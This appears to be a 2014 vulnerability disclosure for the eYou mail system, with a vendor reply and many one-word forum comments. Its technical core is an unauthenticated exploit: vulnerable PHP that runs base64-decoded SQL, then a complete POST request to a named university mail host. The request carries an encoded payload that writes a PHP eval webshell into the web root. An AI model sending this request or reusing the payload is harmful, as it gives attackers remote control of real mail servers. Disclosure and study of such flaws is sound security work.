亿邮邮件系统SQL导致批量GetShell（无需登录）

漏洞文件：/php/bill/print_addfeelog.php

执行任意SQL命令，且不受GPC影响。

默认MYSQL都是有权限导出文件权限的，可以导出一句话后门。

<?
  include("include/config.inc");
  include("include/mysql_wrap.php");
  include("include/utils.php");
  include("include/message.php");
  include("common/check_admin.php");
  
  $sql = base64_decode($_REQUEST['all_sql']);
  $eyouSql = new eyousql();
 
  $eyouSql->query($sql);
 ?>

利用代码：

POST /php/bill/print_addfeelog.php HTTP/1.1
 Content-Length: 140
 Host: mail.sihs.edu.cn
 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.2; zh-CN; rv:1.9.2.28) Gecko/20120306 Firefox/3.6.28
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: en-us
 Accept-Encoding: gzip,deflate
 Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7
 Keep-Alive: 115
 Connection: keep-alive
 X-Forwarded-For: 127.0.0.1
 Cookie: cookie=1;
 
 all_sql=c2VsZWN0ICc8P3BocCBldmFsKCRfUE9TVFsxXSk/PmMnIGludG8gb3V0ZmlsZSAnL3Zhci9leW91L2FwYWNoZS9odGRvY3MvcGhwL2JpbGwvc2NyaXB0L2luZGV4LnBocCc7

不知道这个文件干嘛的？删除可好。

厂商回应：

危害等级：中

漏洞Rank：5

确认时间：2014-07-13 18:13

厂商回复：

经查存在某些版本中，现在已有解决方案，我们将会与客户联系，并尽快修正，非常感谢提供漏洞信息！

最新状态：

暂无

1. 2014-07-12 09:00 | U神 ( 核心白帽子 | Rank:1375 漏洞数:152 | 乌云核心菜鸟，此号处于联盟托管中....)

   3

   这个屌

   1# 回复此人

2. 2014-07-12 09:10 | Cyrils ( 实习白帽子 | Rank:47 漏洞数:12 | the more the better)

   2

   Mark...

   2# 回复此人

3. 2014-07-12 09:13 | Azui ( 实习白帽子 | Rank:61 漏洞数:15 | 人有两件宝，双手和大脑。)

   1

   屌

   3# 回复此人

4. 2014-07-12 09:22 | 屎蛋 ( 路人 | Rank:8 漏洞数:2 | boom)

   1

   mark

   4# 回复此人

5. 2014-07-12 11:16 | Dot ( 路人 | Rank:9 漏洞数:3 | 我就佩服Ph牛！)

   1

   坐等

   5# 回复此人

6. 2014-07-12 11:36 | HackPanda ( 普通白帽子 | Rank:117 漏洞数:16 | Talk is cheap,show me the shell.)

   1

   哪个版本？

   6# 回复此人

7. 2014-07-12 11:59 | pangshenjie ( 普通白帽子 | Rank:110 漏洞数:14 )

   1

   v5以上的么？

   7# 回复此人

8. 2014-07-12 13:06 | xiaokinghk ( 实习白帽子 | Rank:82 漏洞数:16 | 【DBA】)

   2

   MARK

   8# 回复此人

9. 2014-07-12 13:19 | JJ Fly ( 普通白帽子 | Rank:317 漏洞数:59 | 冰眼信息科技安全研究院)

   1

   mark上

   9# 回复此人

10. 2014-07-12 13:46 | Sct7p ( 实习白帽子 | Rank:62 漏洞数:9 | 懂与不懂之间只隔了一层纸，懂的人会觉得很...)

    1

    水表在外面，包裹送门卫

    10# 回复此人

11. 2014-07-12 15:14 | reality0ne ( 路人 | Rank:18 漏洞数:7 )

    2

    mark在此

    11# 回复此人

12. 2014-07-12 16:02 | Bloodwolf ( 实习白帽子 | Rank:47 漏洞数:8 | whoami)

    3

    水表在外面，包裹送门卫

    12# 回复此人

13. 2014-07-12 16:04 | 1fn0 ( 路人 | Rank:27 漏洞数:9 | 我是运维 不要开除我)

    1

    mark

    13# 回复此人

14. 2014-07-12 16:27 | 小新 ( 普通白帽子 | Rank:129 漏洞数:19 | 我可是要成为普通白帽子的小新)

    1

    我擦，竟然忘了登录

    14# 回复此人

15. 2014-07-12 20:24 | 老和尚 ( 普通白帽子 | Rank:223 漏洞数:45 )

    1

    MLGBD 爆破4组准备

    15# 回复此人

16. 2014-08-02 19:17 | ′ 雨。 ( 普通白帽子 | Rank:1332 漏洞数:198 | Only Code Never Lie To Me.)

    2

    。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。这代码 给跪了。。

    16# 回复此人

17. 2014-08-02 20:49 | JJ Fly ( 普通白帽子 | Rank:317 漏洞数:59 | 冰眼信息科技安全研究院)

    1

    好神奇

    17# 回复此人

18. 2014-08-04 22:32 | 书生今天不吃饭 ( 路人 | Rank:2 漏洞数:1 | 没人来过。。。。。)

    1

    mark

    18# 回复此人

19. 2014-08-05 13:49 | 动后河 ( 实习白帽子 | Rank:57 漏洞数:17 | ☭)

    1

    来看看代码

    19# 回复此人

20. 2014-08-26 10:05 | zhxs ( 实习白帽子 | Rank:69 漏洞数:26 | 不是你不行、只是路不平ฏ๎๎๎๎๎๎๎๎...)

    2

    楼主的菜刀不错哦

    20# 回复此人

21. 2014-09-21 21:17 | Sura、Rain ( 路人 | Rank:15 漏洞数:8 | 关注Java WEB安全)

    1

    这刀过狗？

    21# 回复此人